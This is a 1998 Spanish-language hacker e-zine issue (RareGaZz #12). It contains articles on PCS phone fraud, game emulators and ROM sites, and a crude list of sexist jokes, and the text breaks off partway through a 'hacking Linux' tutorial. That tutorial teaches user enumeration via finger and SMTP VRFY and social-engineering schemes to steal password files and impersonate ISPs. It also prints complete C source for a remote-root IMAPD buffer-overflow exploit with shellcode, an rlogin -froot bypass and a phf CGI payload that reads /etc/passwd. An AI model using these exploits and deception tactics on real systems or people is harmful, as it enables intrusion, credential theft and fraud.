RareGaZz12:(RARE012.TXT):07/06/1998 << Back To RareGaZz12

<<::RareGaZz::>> presenta Numero #12 ~~~~~~~~~~~~~~~~~~~~ Contenido ========= 1.- Introduccion 2.- Que diablos es PCS???? -Azumlord- 3.- Nintendo Emus -Yo Soy- 4.- 100 razones por las que es maravilloso ser hombre -Lobo- 5.- Hackeando un sistema Linux -Ironbox- 6.- Hacking Win95 -12r43l Overdrive- 7.- Como conseguir Warez -Sergii- 8.- UNIX: sistema de archivos -GuyBrush- 9.- Easter eggs -Cytorax- 10.- Antes de ser Phreaker -El Emperador- 11.- Cartas del lector -GuyBrush- 12.- Noticias 13.- Despedida _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- @=@=@=@=@=@=@=@=@=@=@ () () () INTRODUCCION () () ~~~~~~~~~~~~ () @=@=@=@=@=@=@=@=@=@=@ Una vez mas estamos con vosotros. Como veis hemos hecho algunos cambios en la Web pero seguimos con las mismas ganas de mantenernos al pie del cañon. Hemos recibido numerosos mails preguntandonos si nos habia pasado algo, y por que no actualizabamos la web ni funcionaba nuestro correo. Bien, hemos tenido algunos problemillas pero ya esta todo solucionado. Para que todos os podais enterar voy a comentaros un poco los cambios que hemos sufrido contestando a este pequeño FAQ: 1) Que paso con RareTrip? Estara ausente durante algun tiempo por motivos mayores. 2) Que paso con KillerBoot, ServerHacker, MisterX, LePompeitor, ...? Tambien estan temporalmente ausentes. 3) Quien llevara entonces la Web? En principio, GuyBrush (yo), Azumlord y Cytorax. 4) Que cambios va a sufrir RareGaZz? - Nueva pagina Web -> Esto es algo habitual, pues ya sabeis que cada cierto tiempo la modificamos. - Nueva direccion de correo -> A partir de ahora debeis escribir a esta direccion: 'raregazz@iname.com' - Nueva mailing-list -> La nueva lista sera: 'raredudez@coollist.com'. Hemos perdido la otra lista por lo que NO HAY NADIE subscrito. Todo el que quiera formar parte de la lista que mande un mail a RareGaZz con el subject: 'subscribe <direccion de correo>' - Nueva llave PGP -> La antigua llave ya no funciona porque hemos perdido el llavero. Acordaros de actualizar vuestro PGP con la llave que viene al final del zine. Tambien la podeis encontrar en la web. 5) Quien sustituye a RareTrip? De momento yo (GuyBrush). RareTrip me pidio que me ocupara de la direccion de RareGaZz durante su ausencia y aunque no este ahora mismo con nosotros, sigo manteniendo contacto con el, por lo que me va indicando los cambios que debemos realizar. 6) Quien es el nuevo lider de RareGaZz? El lider sigue siendo RareTip. Como ya he dicho, sigo sus instrucciones. 7) Por que no se actualizan los mirror de RareGaZz? De momento solo vamos a actualizar la pagina de islatortuga. Pronto espero actualizar los mirror tambien. Es muy probable que acapulco empiece a funcionar pronto. _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ──────────────────────────────────────────────────────────────────────────────── ──────────────────────────────────────────────────────────────────────────────── ─────<|( Que diablos es PCS???? )|>───────────────────────────────────────────── ──────────────────────────────────────────────────────────────────────────────── ─────<|( Traducido al español por Azumlord )|>────────────────────────────────── ──────────────────────────────────────────────────────────────────────────────── Bueno este texto no fue originalmente escrito por mi, yo solo hize la traduccion al español, originalmente fue escrito por KungFuFox de THTJ pero considero que es interesante puesto que esta tecnologia es realmente nueva aqui en Mexico, en fin si quieres saber mas sobre lo que sucede encuanto a Telecomunicaciones en Mexico aqui encontraras buena info: http://www.cft.gob.mx ----> Duh!!!!! Has oido algo sobre PCS? Si? Bien. Sus siglas significan Personal Communications Service(Servicio de Comunicacion Personal). El problema con PCS es que no es amigable con el phreaking. Increiblemente, a la gente normal no le gusta el PCS cuando ven sus recibos por miles de dolares cuando ellos solo recuerdan que su unica llamada fue al 911 para reportar que vieron a un muchacho negro en su vecindario. La rason de que se adoptado mas rapido que un niño gordo en Etiopia es porque algunos pendejos del crimen organizado y/o de los carteles de droga han estado clonando muhos celulares, y como dije antes, la gente odia eso. Las redes PCS transmiten en un frecuencia mas alta que la que usan los actuales sistemas celulares, entre 1850MHz y 2200Mhz, comparados con los 800MHz de la banda usada por los actuales sistemas celulares. Estas redes de PCS son todas digitales, esto significa mejor calidad de transmision y la capacidad del cliente es mas alta. La razon detras de necesitar una capcidad mas alta esque los radiofonistas(Los que usan la radio pa' comunicarse, Duh!), se estan expandiendo como un mapache hambriento en una tienda de donas. Actualmente hay 52,687,924 usarios de la radio, un numero que se espera se incremente en un futuro. Dije "se espera se incremente en un futuro" mejor dicho que una cifra o una fecha porque he visto diferentes numeros desordenados de diferentes fuentes. Incluso la gente de la radiofonia es tan estupida para saber como estara su indutria en 30 meses. El mercado de el PCS se expandera rapidamente, creciendo relativamente de unos cuanto clientes ahora a un estimado de 15 millones para el año 2000. Sobre el 3 porciento de el ingreso de la radiofonia en 1996 viene del fraude celular, aunque el porcentaje ha sido 6 porciento mas alto que a principios de esta decada. La cantidad de dinero perdida por este de fraude, en 1995 es mas o menos por los $650 millones de dolares, y ha sido un gran factor detras de la adopcion de el PCS sobre el celular (no porque las compañias de celulares quieran obtener mas dinero de ti), porque PCS ofrece un excelente manejabilidad de los rasgos de seguridad para evitar los intentos de clonacion. Los rasgos de seguridad de el pasado como llamar al clon y tratar de "ponerle una chinga" son lentos pero seguramente seran reemplazados con los rasgos encontrados solo en las redes de PCS, como la radio frecunecia fingerprinting, que vincula la igualacion de un ESN de un radiotelefono con otro numero de identidad unico para la cuenta del usuario. Si esos numeros no son iguales tu clon no funcionara por mas de una semana, al mismo tiempo el usuario recibira alertas automaticas cuando un fraude es detectado (Pero eso te da suficiente tiempo para hacer un par de miles de llamadas a tu BBS favorito en Alemania). Incluso Celulares y PCS comparten formas para prevenir el fraude. Como el software usado por las compañias de tarjetas de credito para detectar patrones de compra irregulares, este software ha sido desarrollado para el uso con los servicios de telefonia inalambrica para detectar patrones sospechosos de llamadas, como llamadas sorpresivas y recientes a Cali, Colombia o llamadas frecuentes a 1900quierosexo. Estas actividad sospechosa es reportada y usualmente esto significa la muerte del clon. RoamEx, una red internacional de intercambio de datos, mantiene las huellas de la actividad de llamadas que un usuario de celulares y PCS tiene y estas huellas son inmediatamente accesibles al provedor del usuario. La actividad sospechosa de llamadas es investigada y es posible que lleve a la aniquilacion del clon. Algunos servicios radiofonicos establen 'perfiles' para describir el tipo de llamadas que un determinado usuario quiera hacer, como el no-roaming, interestatal, etc. Llamadas que son hechas fuera del perfil requieren el uso de un PIN Personal Identification Number(Numero personal de Identificacion) para poder permitir a la llamada conectarse, lo cual no significa que tengas que robar el PIN de alguna persona, mejor solo habla con todos en tu area local un ciento de veces. Todo en todo, las grandes ventajas de el PCS sobre los celulares es que este usa toda la tecnologia digital, haciendolo mucho menos vulnerable al robo de ondas de aire, y es compatible con la tecnologia GSM (por supuesto, las compañias radiofonicas QUIEREN que tu pienses que el precio mas alto es una ventaja). Global Systems for Mobile Communications(Sistemas Globales para Comunicaciones Mobiles) (GSM) es una tecnologia digital y es la mas avanzada en su tipo en la radiofonia mundial. Ofrece una gran cantidad de servicios que sistemas que no son GSM no tiene, por ejemplo, voz, datos, fax y capacidades de pageo integradas, pero la mas importante es que elimina la clonacion e indiscrecion. GSM tambien ofrece la unin de roaming atravez de America del Norte, y permita aun mas rasgos de seguridad personalisada con el uso de la tecnologia de la Smart Card, que esta disponble en la telaraña mundial. La unica verdadera ventaja que los celulares actualmente tienen sobre el PCS es la cobertura de costa a costa, la cual no existe en areas donde los provedores han desabilitado el roaming para evitar los patrones de fraude, y las lineas amigables con el phreak. Como se definio antes, los servicos de el PCS utilizando el GSM tienen una cobertura de costa a costa, pero no se chinga al logo de "amigable con el phreack(c)". Los celulares aun son mas populares que el PCS y la gran parte de esto se debe al costo. A medida que el PCS madure el precio se ira haciendo mas barato y por lo tanto mas aceptado, y eso significa menos y menos telefonos clonados. Supongo que eventualmente esa gente en el crimen organizado tendra que robarle los telefonos a la gente directamente de sus manos. ____________________________________________________________________________ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <*><*><*><*><*><*><*><*><*> <*> <*> <*> NINTENDO EMUS <*> <*> ~~~~~~~~~~~~~ <*> <*><*><*><*><*><*><*><*><*> Por ahora solo les vamos a hablar de los emuladores de las consolas de videojuegos de la casa Nintendo y donde conseguir algunas roms :), si no sabes lo que son las roms leete RareGaZz #10. El sistema nintendo de 8 bits (NES) tiene varios emuladores de entre los cuales a mi parecer el mejor es: - Nesticle 0.43 de Bloodlust Software. Este emulador emula la mayoria de las roms que existen, por no decir todas :), y el aspecto de este emulador tiene un tipo de Front End para hacer mas sencilla la tarea. Si deseas este emulador, no tienes mas que pasarte por la pagina de Software de RareGaZz. Y si quieres roms en la pagina tambien te las facilitan. El Super Nintendo es una de las consolas de videojuegos mas popular , y su emulacion se realiza con mas dificultad debido a que existen juegos en los que es necesario contar con cierto tipo de hardware para ser jugado , ( chips como el FX de Nintendo o el CX4 de Capcom ) que generalmente son usados para mejorar los graficos. En esta consola existen varios emuladores que ahi se van, pero los que llevan la delantera es el Snes9X, Zsnes y el Esnes. Por cierto, de el Snes9X ya estaba la version final del emulador (aunque no emulaba ningun juego con chip, asi que no podias jugar Yoshi Story, etc) pero hace poco el emulador ha sido traspasado a otras personas quienes estan dispuestos a emular el Chip FX y que proximamente podras tener en tus manos. El emulador en verdad es bueno, tan rapido como la consola verdadera aunque depende del tipo de computadora que tengas. Lo mas recomendable es contar con una Pentium. El Zsnes es un emulador que no ha parado de sacar versiones, es decir, cada vez puede que te lleves una sorpresa con el ( por ejemplo, pueden sacar hasta tres versiones en 1 semana ). Si deseas bajar el emulador paseate por las paginas oficiales de cada emu, donde siempre te encontraras con las ultimas versiones o visita http://www.davesclassics.com/. Si lo que quieres es roms de snes las puedes encontrar en la siguiente direccion: http://snesmerism.deemon.com La Pagina Oficial del Snes9x -----> http://www.euronet.nl/users/jkoot/ La Pagina Oficial del Zsnes -----> http://www.csoft.net/zsnes El Gameboy es una de las primeras consolas que fueron emuladas, el mejor emulador es el GB97 y el VGB, los dos aceptan Joystick y sonido. El VGB,( Virtual Gameboy ) puede ejecutar aproximadamente el 85% de las roms y tambien hay versiones para Linux :), el GB97 es muy bueno tambien. - VGB 0.88 ---->http://www.davesclassics.com/ - GB97 2.937 ---->http://www.davesclassics.com/ Si quieres roms de Game Boy las puedes encontrar en http://home5.swipnet.se/~w-52849/indsex.htm o si quieres alguna rom que no has podido encontrar mandame un mail pidiendola ( solo GB ). Los beneficios de los emuladores son varios, como es el jugar tus juegos favoritos gratis, jugar los ultimos juegos, jugar juegos japoneses que por ciertas razones no llegan a America y es dificil encontrarlos, etc. Bueno, por ahora eso es todo, si te interesa esto puedes buscar informacion en una page de emuladores (muchas) o en el canal #emuladores del Irc Hispano o en el canal #emu de Undernet. _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- [.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.] [.] [.] [.] 100 RAZONES POR LAS QUE ES MARAVILLOSO SER HOMBRE [.] [.] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [.] [.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.][.] 1.Las conversaciones telefonicas duran 30 segundos 2.En las peliculas los desnudos son casi siempre femeninos 3.Sabes cosas sobre coches y tanques 4.Vacaciones de 5 dias requieren solo una maleta 5.Futbol los domingos, lunes, martes, miercoles... 6.No tenes que estar al dia de la vida sexual de tus amigos 7.Las colas al ba±o son 80% menores 9.A los viejos amigos no les importa si subiste o bajaste de peso 10. En las peluquerias no te roban 11. Mientras haces zapping, no tienes que parar cada vez que ves a alguien llorando 12. Tu culo no es un factor en entrevistas de trabajo 13. Todos tus orgasmos son reales 14. Una panza de cerveza no te hace invisible al otro sexo 16. No tenes que llevar un bolso lleno de estupideces a todos lados 17. No tienes que taparte la falda cada vez que subes una escalera en un lugar publico 18. Puedes ir al ba±o sin ir en grupo 19. Tu apellido permanece 20. Puedes dejar la cama de un hotel sin hacer 21. Cuando tu trabajo es criticado, no tenes que pensar que todos secretamente te odian 24. Te dan mas credito por el menor acto de inteligencia 26. Nadie piensa secretamente si " te la tragas " 27. Nunca tienes que limpiar el inodoro 28. Podes estar ba±ado y listo en 10 minutos 29. En el sexo nunca tienes que preocuparte por tu reputacion 30. Los planes de la boda se arreglan solos 31. Si alguien se olvida de invitarte a algun lado, todavia puede ser tu amigo/a 32. Tu ropa interior cuesta un 60% menos 34. Ninguno de tus colegas de trabajo tiene la capacidad de hacerte llorar 35. No tenes que afeitarte del cuello para abajo 37. Si tenes 34 y eres soltero a nadie le importa 39. Puedes apuntarte a un campeonato de mear 40. Toda tu cara se queda del mismo color 42. Puedes ser presidente 43. Puedes disfrutar silenciosamente de un paseo en coche 44. Las flores siempre lo arreglan todo 45. Nunca tienes que preocuparte de los sentimientos de otras personas 46. Piensas sobre sexo el 90% de las veces cuando te despiertas 47. Puedes llevar una camiseta blanca a un lugar con mucha agua que salpique 48. Tres pares de zapatos son mas que suficientes 50. Puedes decir cualquier cosa y no preocuparte por lo que piensa la gente 51. "Jugar " antes del sexo es opcional 52. Luis Miguel, Tom Cruise y los demas no existen en tu universo 54. Te puedes quitar la camiseta cuando hace calor 55. No tienes que limpiar tu apartamento cada vez que entre alguien 57. Los mecanicos no te mienten 58. Te importa un carajo si alguien se da cuenta o no de tu nuevo corte de pelo 59. Puedes ver television con un amigo, en total silencio por horas, sin pensar " debe estar enojado conmigo " 64. Un estado de animo, todo el tiempo 65. Puedes admirar a Clint Eastwood sin matarte de hambre tratando de parecerte a el 66. No tienes que conducir hasta otra estacion de servicio porque esta es muy sucia 67. Sabes por lo menos 20 formas de abrir una cerveza 68. Podes sentarte con las piernas abiertas sin importar que estes vistiendo 69. Mismo trabajo... mas paga 70. Pelo gris y arrugas quedan bien 72. Vestido de bodas: 200.000; Traje alquilado: 10.000 73. No te importa si alguien habla a tus espaldas 74. Siempre hay algun partido en la television 75. No sacas pedacitos de los postres de otros 77. El control remoto es solo tuyo 78. La gente nunca echa miraditas a tu pecho cuando le hablas 80. Puedes pasar a visitar un amigo sin tener que llevarles un regalo 83. Puedes comprar condones sin que el cajero te imagine desnudo 85. Si no llamas a un amigo cuando dijiste que lo ibas a llamar, no le va a decir a tus amigos que cambiaste 86. Algun dia, puedes llegar a ser un atorrante viejo verde 87. Puedes racionalizar cualquier cosa con la frase " !Y, a la mierda! 88. Si alguien aparece en una fiesta con tu misma ropa, podes llegar a hacerte amigo 90. Un buen eructo es casi casi predecible 91. Nunca te pierdes una experiencia sexual porque " no quieres " 95. Las peliculas porno estan disenadas para ti 96. No tienes que recordar fechas de cumpleanos y aniversarios 97. Que no te caiga bien una persona no quita tener buen sexo con ella 100. Con 400 millones de esparmatozoides por tiro, podrias doblar la poblacion de la tierra, al menos en teoria.. _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ********************************************************************** * * * HACKEANDO UN SISTEMA LINUX * * -------------------------- * ********************************************************************** Como todo el mundo sabra ya, linux es cada vez mas popular entre los usuarios. Usar linux es guay y mucha gente que antes le daba la espalda ahora se encuentra con linux instalado en su disco duro. Pero no todo va a ser tan bonito, linux es un muy buen sistema operativo, pero como todo,tiene fallos. En este texto voy a intentar explicar algunos metodos para conseguir hackear un sistema linux. Lo hago con este sistema ya que es el mas conocido,aunque muchas cosas son exportables a otros sistemas operativos parecidos,como bsd, sunOS y cualquier otro derivado de unix. 1.- Consiguiendo informacion de la maquina. ************************************************ Una de las cosas mas importantes a la hora de hackear un sistema (o intentar) es obtener la maxima informacion disponible sobre el. En definitiva se trata de obtener las versiones de sus daemons,como pueden ser ftp,sendmail,etc, los puertos que tiene abiertos y toda informacion que nos pueda ser util. Para conseguir las versiones de los demonios se accede al puerto en cuestion, y normalmente solo con eso se nos muestra una linea o dos con informacion.Aqui pongo una lista de los puertos completa,ya se que completa es un co±azo pero la pongo por si a alguien le es util. **** LISTA DE PUERTOS ***** tcpmux 1/tcp # rfc-1078 echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp domain 53/udp mtp 57/tcp # deprecated bootps 67/udp # bootp server bootpc 68/udp # bootp client tftp 69/udp gopher 70/tcp # gopher server rje 77/tcp #finger 79/tcp #http 80/tcp # www is used by some broken #www 80/tcp # progs, http is more correct link 87/tcp ttylink kerberos 88/udp kdc # Kerberos authentication--udp kerberos 88/tcp kdc # Kerberos authentication--tcp supdup 95/tcp # BSD supdupd(8) hostnames 101/tcp hostname # usually to sri-nic iso-tsap 102/tcp x400 103/tcp # x400-snd 104/tcp csnet-ns 105/tcp #pop-2 109/tcp # PostOffice V.2 #pop-3 110/tcp # PostOffice V.3 #pop 110/tcp # PostOffice V.3 sunrpc 111/tcp sunrpc 111/tcp portmapper # RPC 4.0 portmapper UDP sunrpc 111/udp sunrpc 111/udp portmapper # RPC 4.0 portmapper TCP auth 113/tcp ident # User Verification sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/tcp # Network Time Protocol ntp 123/udp # Network Time Protocol #netbios-ns 137/tcp nbns #netbios-ns 137/udp nbns #netbios-dgm 138/tcp nbdgm #netbios-dgm 138/udp nbdgm #netbios-ssn 139/tcp nbssn #imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp snmp-trap 162/udp exec 512/tcp # BSD rexecd(8) biff 512/udp comsat login 513/tcp # BSD rlogind(8) who 513/udp whod # BSD rwhod(8) shell 514/tcp cmd # BSD rshd(8) syslog 514/udp # BSD syslogd(8) printer 515/tcp spooler # BSD lpd(8) talk 517/udp # BSD talkd(8) ntalk 518/udp # SunOS talkd(8) efs 520/tcp # for LucasFilm route 520/udp router routed # 521/udp too timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc # experimental conference 531/tcp chat netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # BSD uucpd(8) UUCP service klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs # Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental pcserver 600/tcp # ECD Integrated PC board srvr mount 635/udp # NFS Mount Service pcnfs 640/udp # PC-NFS DOS Authentication bwnfs 650/udp # BW-NFS DOS Authentication kerberos-adm 749/tcp # Kerberos 5 admin/changepw kerberos-adm 749/udp # Kerberos 5 admin/changepw kerberos-sec 750/udp # Kerberos authentication--udp kerberos-sec 750/tcp # Kerberos authentication--tcp kerberos_master 751/udp # Kerberos authentication kerberos_master 751/tcp # Kerberos authentication krb5_prop 754/tcp # Kerberos slave propagation listen 1025/tcp listener RFS remote_file_sharing nterm 1026/tcp remote_login network_terminal #kpop 1109/tcp # Pop with Kerberos ingreslock 1524/tcp tnet 1600/tcp # transputer net daemon cfinger 2003/tcp # GNU finger nfs 2049/udp # NFS File Service eklogin 2105/tcp # Kerberos encrypted rlogin krb524 4444/tcp # Kerberos 5 to 4 ticket xlator irc 6667/tcp # Internet Relay Chat ----------------- Bueno,despues de todo este rollo os pregutareis: y cuales son realmente los puertos importantes?? Pues bien,los realmente importantes (mas o menos) son: el ftp(21),telnet(23),sendmail(25),finger(79),http(80),pop(110) y imap(143). Estos son (para mi al menos) los que mas usaremos a la hora de hackear. Para sacar informacion de cada uno de ellos basta con ir haciendo telnets uno por uno. Ej: telnet maquina.com 21 --> te dije la version del ftp, telnet ma- quina.com 23 --> te dice la version del sistema operativo(normalmente), y asi con todos. Recomiendo que a la hora de mirar versiones,etc. no intenteis meter ningun password porque quedara todo grabado junto con vuestra direccion ip. Tambien es interesante hacer un scaneo de puertos a la maquina. Hay muchos pro- gramas en internet que hacen esta funcion. Yo recomiendo el phobia, que es bas- tante rapido. Estos programas a veces traen opciones para scanear solo un de- terminado numero de puertos, por ejemplo del 1 al 200. El phobia trae tb po- sibilidades de ataque,como sobreescribir un buffer en el ftpd,etc. pero que ya tiene mucho tiempo y es improbable que funcione. 1.1.- POSIBILIDADES DEL FINGER Y SMTP. ---------------------------------- El puerto del finger(79) se usa para conseguir informacion de los usuarios de esa maquina. Se usa simplemente con: telnet maquina.com 79. Si obteneis una respuesta como: "telnet: Unable to connect to remote host: Connection refused", es que o tiene activado un firewall(esto ya se vera mas adelante) o tiene cerrado el puerto del finger. Si se conecta sin problemas,simplemente tecleando un nombre de usuario conseguireis informacion sobre el.No os preo- cupeis si lo que escribais no sale en pantalla,es porque tiene el eco redire- ccionado a una salida nula. Si por ejemplo tecleais "test",y resulta que al- guien tiene ese nombre de usuario(login), os saldra algo como esto: Login: test Name: Jose Ramon Suarez Directory: /home/test Shell: /bin/bash Last login Sat May 9 00:16 (CEST) on tty3 No mail. No Plan. Como veis se muestra mucha informacion util,como su nombre completo,su direc- torio home,si tiene mail,etc.. Esto puede ser usado para intentar algun pass, como joramon..ya entendeis. Tambien podeis mandarle un mail haciendos pasar por el root del sistema y pidiendole su password con alguna excusa,pero esto ya esta muy visto y no creo que funcione,ademas,como se lo diga al root de verdad y no hayais usado un metodo para mandar mails anonimos..pillais,no? :). Tb puede usarse el sendmail(25) para conseguirse un resultado similar. La cuestion es que muchos proovedores de internet (por lo menos en espa±a), en vez de usar un servidor para correo entrante(pop-110) y otro para correo saliente (smtp-25) pues usan uno solo para las dos cosas,y si usan dos pues en el de correo entrante dejan abierto el puerto de smtp. Pues bien,si haceis un telnet al servidor de correo entrante al puerto 25,y luego usais el comando vrfy para verificar si existe un usuario en cuestion muchas veces os devolvera el nombre del usuario completo. Ejemplo: Un tio tiene de mail jose@ctv.es. Pues poneis; telnet pop.ctv.es 25 --> luego, vrfy jose , y os devolvera algo como: Jose Luis Suarez Vazquez <jose@ctv.es>. Con esto,y si sabeis la poblacion del tio, pues llamais al 003 para sacar su telefono,lo llamais diciendo que sois de ctv....etc etc, lo demas ya lo dejo a vuestra imaginacion :). Ademas,el servicio de finger cada vez esta mas en desuso por lo que este metodo cobra mas importancia. Nota: El comando expn hace la misma funcion,pero normalmente esta desactivado. 2.- CONSIGUIENDO UNA CUENTA: ******************************** Esto es una de las cosas mas dificiles (aunque parezca mentira) a la hora de hackear. La forma mas facil de conseguirla es con ingenieria social,pero ya esta muy visto y es muy chungo que lo consigais. Por si alguien no lo sabe ingenieria social es intentar enga±ar a alguien para que te de su pass o in- formacion util. Lo de la tia novata ya esta muy visto,o sea que yo recomiendo nukear a alguien un par de veces,y cuando ya este el tio hasta las narices le haceis un query y le decis algo como: "joer,no se quien anda nukeando..no estas protegido?", luego le ense±as como protegerse pero le dices que para saber que puerto tiene que cerrar exactamente te tiene que mandar por dcc los files con extension pwl de su \windows\,captais la idea,no? :). Luego crackeais el fichero con el glide por ejemplo. Ahora voy a centrarme ya en el Linux,lo de antes era para enga±ar a alguien con win95 y poder acceder al server de su proveedor con su login:pass. Hay varios metodos en algunas distribuciones de linux que te permiten conse- guir una cuenta desde fuera, e incluso algunas con nivel de root. Esta que voy a poner ahora es para RedHat,funciona hasta la version 4.0 in- cluida y lo que hace es sobreescribir un buffer en el imap(puerto 143) con- siguiendo una shell con nivel de root. Tienes que tener instalado el pro- grama netcat (esta disponible en muchos lugares de la red), y se utiliza con: "(imap 0000000000;cat) | nc maquina.com 143", tienes que poner muchos ceros para que rule,aunque va a ser chungo que encuentres una redhat 4.0 la verdad. Bueno,aqui va: ---------- comienzo ---------- /* * IMAPD REMOTE EXPLOIT * exploit code from TiK/paladine's imap+nc exploit * socket code by BiT */ #include <stdio.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> #include <sys/time.h> #include <errno.h> void read_soc(int sock); void read_key(int sock); char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; void phand(int s) { return; } void ihand(int s) { printf("SIGINT catched, exiting...\n"); exit(4); } void dome() { printf("IMAPD REMOTE EXPLOIT\n"); printf("Exploit code by TiK/paladine\n"); printf("Socket code by BiT\n\n"); } void banner(char *wee) { printf("Syntax: %s <host> [<offset>]\n",wee); exit(1); } void main(int argc, char *argv[]) { int i,a,s; long val; fd_set blockme; char username[1024+255]; char buf[1500]; dome(); if(argc<2) banner(argv[0]); if(argc>2) a=atoi(argv[2]); else a=0; strcpy(username,shell); for(i=strlen(username);i<sizeof(username);i++) username[i]=0x90; val = 0xbffff501 + a; for(i=1024;i<strlen(username)-4;i+=4) { username[i+0] = val & 0x000000ff; username[i+1] = (val & 0x0000ff00) >> 8; username[i+2] = (val & 0x00ff0000) >> 16; username[i+3] = (val & 0xff000000) >> 24; } username[ sizeof(username)-1 ] = 0; if((s=wee(argv[1],143)) == -1) { printf("Connection refused.\n"); exit(2); } signal(SIGPIPE,phand); signal(SIGINT,ihand); printf("Exploiting %s with offset %d...\n",argv[1],a); sprintf(buf,"%d LOGIN \"%s\" pass\n", sizeof(shell), username); write(s,buf,strlen(buf)); while(1) { FD_ZERO(&blockme);FD_SET(s,&blockme);FD_SET(0,&blockme); fflush(stdout);fflush(stdin); if(select(FD_SETSIZE, &blockme, NULL, NULL, NULL)) { if(FD_ISSET(0,&blockme)) read_key(s); if(FD_ISSET(s,&blockme)) read_soc(s); } } } void read_soc(int sock) { static char sbuf[512]; static int i=0; char c,j; j=read(sock,&c,1); if(j<1&&errno!=EAGAIN) { printf("Connection dropped.\n"); exit(3); } if(i>510) c='\n'; if(c=='\n') { sbuf[i++]=c;sbuf[i]=0;i=0; printf(sbuf); } else sbuf[i++]=c; } void read_key(int sock) { static char kbuf[512]; static int i=0; char c,j; j=read(0,&c,1); if(i>510) c='\n'; if(c=='\n') { kbuf[i++]=c;kbuf[i]=0;i=0; write(sock,kbuf,strlen(kbuf)); } else kbuf[i++]=c; } int wee(char *host,int port) { struct hostent *h; struct sockaddr_in s; int sock; h=gethostbyname(host); if(h==NULL) return -1; sock=socket(AF_INET,SOCK_STREAM,0); s.sin_family=AF_INET; s.sin_port=htons(port); memcpy(&s.sin_addr,h->h_addr,h->h_length); if(connect(sock,(struct sockaddr *)&s,sizeof(s)) < 0) return -1; fcntl(sock,F_SETFL,O_NONBLOCK); return sock; } -------- final ---------- Otro metodo para conseguir una shell de root desde fuera se da en las distri- buciones slackware hasta la 3.1 incluida. Se trata de un bug del rlogin, por lo que no hace falta exploit. Se usa de la siguiente forma: "rlogin maquina.com -l -froot". Tb esta el metodo de usar bugs de scripts cgi, como puede ser el phf, amplia- mente conocido pero que todavia rula. Por mi experiencia los sistemas con este bug suelen ser los SunOS, y suelen estar en las universidades. Se usa des- de el navegador, como puede ser el netscape, de la siguiente formal: "http://www.maquina.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd". Esto lo que hace es imprimir el fichero /etc/passwd pero puede ser usado para ejecu- tar cualquier comando remotamente.(no me extengo mas porque considero que el phf ya esta muy explicado en otros articulos). Otra cosa, muchas distribuciones de linux te montan automaticamente las parti- ciones msdos, por lo que si tienes acceso al linux de algun colega solo tienes que ir a /mnt/c: o lo que sea, a /windows/ y bajarte el pwl, pillais,no? :). 3.- CONSEGUIR EL /ETC/PASSWD ********************************* Una vez que tienes una cuenta lo siguiente es conseguir el fichero de pass de la 